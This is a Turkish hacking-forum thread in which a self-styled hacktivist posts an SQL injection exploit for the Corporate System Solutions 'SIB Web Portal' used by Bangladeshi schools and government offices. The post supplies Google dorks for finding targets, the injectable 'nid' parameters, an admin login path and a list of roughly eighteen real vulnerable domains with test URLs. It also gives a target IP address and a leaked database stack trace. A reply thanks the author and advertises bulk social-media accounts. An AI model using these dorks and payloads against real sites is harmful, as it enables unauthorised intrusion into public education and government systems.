Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 3
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Corporate System Solutions SIB Web Portal SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,371 / 1,371
Deneyim: 87 / 100
Rep Sayısı: 2755
Mesaj Sayısı: 6309
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Corporate System Solutions SIB Web Portal SQL Inj
04.11.2018 01:03
################################################################################​#################

# Exploit Title : Technical Support Corporate System Solutions Limited SIB Web Portal Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : sib.gov.bd
# Tested On : Windows and Linux
# Version Information : Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36430
# Category : WebApps
# Google Dorks :
+ intext:''Software: Corporate System Solutions Limited'' site:edu.bd
+ intext:''Software: Corporate System Solutions Limited'' site:gov.bd
+ intext:''কারিগরি সহায়তায়: কর্পোরেট সিস্টেম সলিউশনস লিমিটেড'' site:edu.bd
+ intext:''কারিগরি সহায়তায়: কর্পোরেট সিস্টেম সলিউশনস লিমিটেড'' site:gov.bd
+ intext:পরিকল্পনা ও বাস্তবায়নে: বিদ্যালয় ও পরিদর্শন শাখা মাধ্যমিক ও উচ্চ শিক্ষা অধিদপ্তর''
+ intext:''SIB Web Portal'' site:edu.bd
+ intext:''SIB Web Portal'' site:gov.bd
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110011

################################################################################​#################

# Admin Panel Login Path :

automation.sib.gov.bd

# SQL Injection Exploit :

/notice-details.aspx?nid=[SQL Injection]

/news-details.aspx?nid=[SQL Injection]

################################################################################​#################

# Example Vulnerable Sites =>

[+] sib.gov.bd/notice-details.aspx?nid=188%27 => [ Proof of Concept ] => archive.is/8Vyo0

[+] matripithedu.gov.bd/news-details.aspx?nid=44%27

[+] shedz.gov.bd/notice-details.aspx?nid=194%27

[+] habiganjgovthighschool.edu.bd/notice-details.aspx?nid=150%27

[+] bbgovghs.edu.bd/notice-details.aspx?nid=182%27

[+] naogaonzillaschool.edu.bd/notice-details.aspx?nid=171%27

[+] jzsj.edu.bd/news-details.aspx?nid=23%27

[+] nfs1873.edu.bd/news-details.aspx?nid=47%27

[+] rangpurzillaschool.edu.bd/notice-details.aspx?nid=159%27

[+] naogaonzillaschool.edu.bd/news-details.aspx?nid=44%27

[+] sigghs.edu.bd/notice-details.aspx?nid=213%27

[+] nawabpurghs.edu.bd/news-details.aspx?nid=44%27

[+] gscghs.edu.bd/news-details.aspx?nid=46%27

[+] mghsraj.edu.bd/notice-details.aspx?nid=146%27

[+] nghs.edu.bd/notice-details.aspx?nid=8%27

[+] czs.edu.bd/notice-details.aspx?nid=153%27

[+] ngbhsnatore.edu.bd/notice-details.aspx?nid=194%27

[+] TARGET Vulnerable IP Address => 103.48.16.122

################################################################################​#################

# SQL Database Error =>

Server Error in '/' Application.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''188'')' at line 1
Description: An unhandled exception occurred during the execution of the current web request.
Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: MySql.Data.MySqlClient.MySqlException: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''188'')' at line 1

Source Error:

Line 17: MySqlCommand objComm = new MySqlCommand(strSQL, DBConn.GetConn());
Line 18: objComm.Connection.Open();
Line 19: MySqlDataReader objReader = objComm.ExecuteReader();
Line 20: if (objReader.Read())
Line 21: {

Source File: c:\inetpub\wwwroot\sib.gov.bd\notice-details.aspx.cs Line: 19

Stack Trace:

[MySqlException (0x80004005): You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''188'')' at line 1]
MySql.Data.MySqlClient.MySqlStream.ReadPacket() +485
MySql.Data.MySqlClient.NativeDriver.GetResult(Int32& affectedRow, Int32& insertedId) +444
MySql.Data.MySqlClient.Driver.NextResult(Int32 statementId, Boolean force) +131
MySql.Data.MySqlClient.MySqlDataReader.NextResult() +1222
MySql.Data.MySqlClient.MySqlCommand.ExecuteReader(CommandBehavior behavior) +2333
notice_details.Page_Load(Object sender, EventArgs e) in c:\inetpub\wwwroot\sib.gov.bd\notice-details.aspx.cs:19
System.Web.UI.Control.LoadRecursive() +71
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +3178

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36430

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 04.11.2018 Tarihinde, Saat: 01:11 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Rep Verenler: Dessy
Dessy
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 21
Yaşam Puanı: 271 / 522
Deneyim: 89 / 100
Rep Sayısı: 102
Mesaj Sayısı: 568
Üyelik Tarihi: 20.11.2015
     
Yorum: #2
RE: Corporate System Solutions SIB Web Portal SQL Inj
08.11.2018 08:28
Eline sağlık :)

İnstagram Sınırsız Hesap > Git
Youtube Sınırsız Hesap > Git
Sosyal Medyada Sınırsız Hesap Açma p2 Yakında.
Alinti



1 Ziyaretçi